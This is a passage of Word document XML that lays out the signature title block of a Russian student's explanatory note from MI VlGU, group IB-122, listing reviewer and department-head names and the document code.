    <w:tr w:rsidR="00751F4F" w14:paraId="355266EF" w14:textId="77777777" w:rsidTr="005541FA">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="954" w:type="dxa"/>
          <w:gridSpan w:val="2"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:left w:val="nil"/>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="0C4F992E" w14:textId="486B9A08" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:left="57"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Конс.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1400" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="64B43E7E" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:left="57"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="730" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="71CE5E3B" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="561" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="1502044F" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="008041DB">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3924" w:type="dxa"/>
          <w:vMerge/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="096BFC61" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2807" w:type="dxa"/>
          <w:gridSpan w:val="5"/>
          <w:vMerge w:val="restart"/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
            <w:right w:val="nil"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="61B30E7F" w14:textId="07269B29" w:rsidR="00751F4F" w:rsidRPr="00EB7AB1" w:rsidRDefault="00EB7AB1" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00EB7AB1">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>МИ</w:t>
          </w:r>
          <w:r w:rsidR="00A4285B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/>
          <w:r w:rsidRPr="00EB7AB1">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>ВлГУ</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
        </w:p>
        <w:p w14:paraId="4AFF0AE9" w14:textId="381559F3" w:rsidR="00EB7AB1" w:rsidRPr="00984376" w:rsidRDefault="009D45A4" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>ИБ</w:t>
          </w:r>
          <w:r w:rsidR="00EB7AB1" w:rsidRPr="00EB7AB1">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>-</w:t>
          </w:r>
          <w:r w:rsidR="0064344F">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>12</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>2</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00751F4F" w14:paraId="71F7ECD5" w14:textId="77777777" w:rsidTr="005541FA">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="954" w:type="dxa"/>
          <w:gridSpan w:val="2"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:left w:val="nil"/>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="015B0B95" w14:textId="584B74AF" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:left="57"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:proofErr w:type="spellStart"/>
          <w:proofErr w:type="gramStart"/>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Н.контр</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:proofErr w:type="gramEnd"/>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1400" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="1CD7FD3E" w14:textId="2556F83B" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00DD5A13" w:rsidP="00DD5A13">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Мареев А. В.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="730" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="251AEA26" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="561" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="149582BF" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="008041DB">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3924" w:type="dxa"/>
          <w:vMerge/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="46C5876E" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2807" w:type="dxa"/>
          <w:gridSpan w:val="5"/>
          <w:vMerge/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
            <w:right w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="0E4E6EA8" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00751F4F" w14:paraId="6195E689" w14:textId="77777777" w:rsidTr="005541FA">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="954" w:type="dxa"/>
          <w:gridSpan w:val="2"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:left w:val="nil"/>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="3DBF365D" w14:textId="3BBFD0F3" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:left="57"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:proofErr w:type="spellStart"/>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Зав.каф</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1400" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="6B955890" w14:textId="40C82E19" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00D07A04" w:rsidP="00D07A04">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Орлов А. А.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="730" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="5B7370CA" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="561" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="76BAE58C" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="008041DB">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3924" w:type="dxa"/>
          <w:vMerge/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="7B0528D6" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2807" w:type="dxa"/>
          <w:gridSpan w:val="5"/>
          <w:vMerge/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
            <w:right w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="6A80930A" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="6C755CA2" w14:textId="77777777" w:rsidR="004654AE" w:rsidRPr="00444D35" w:rsidRDefault="004654AE">
    <w:pPr>
      <w:pStyle w:val="a5"/>
      <w:rPr>
        <w:sz w:val="32"/>
        <w:szCs w:val="3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376" w:type="dxa"/>
      <w:tblInd w:w="-369"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0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
      <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="400"/>
      <w:gridCol w:w="570"/>
      <w:gridCol w:w="1311"/>
      <w:gridCol w:w="854"/>
      <w:gridCol w:w="570"/>
      <w:gridCol w:w="6101"/>
      <w:gridCol w:w="570"/>
    </w:tblGrid>
    <w:tr w:rsidR="002674A5" w14:paraId="2DECFE4D" w14:textId="77777777" w:rsidTr="00B94CE4">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="398" w:type="dxa"/>
          <w:tcBorders>
            <w:left w:val="nil"/>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="128C5A24" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="2D6ADC2A" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1304" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="778CFCDD" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="849" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="76CDA0AB" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="4999C006" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="498"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6067" w:type="dxa"/>
          <w:vMerge w:val="restart"/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="2A68826B" w14:textId="5BF91413" w:rsidR="002674A5" w:rsidRPr="00751F4F" w:rsidRDefault="00512D96" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:right="144"/>
            <w:jc w:val="right"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00512D96">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:t>МИВУ.10.03.01-07.000       ПЗ</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            <w:right w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="06600D5B" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="004B538F" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Лист</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="002674A5" w14:paraId="37CDEF11" w14:textId="77777777" w:rsidTr="00B94CE4">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="398" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:left w:val="nil"/>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="77E4AA2F" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="1A61C197" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1304" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="334C82B7" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="849" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="193F7D8D" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="33C0403F" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="498"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6067" w:type="dxa"/>
          <w:vMerge/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
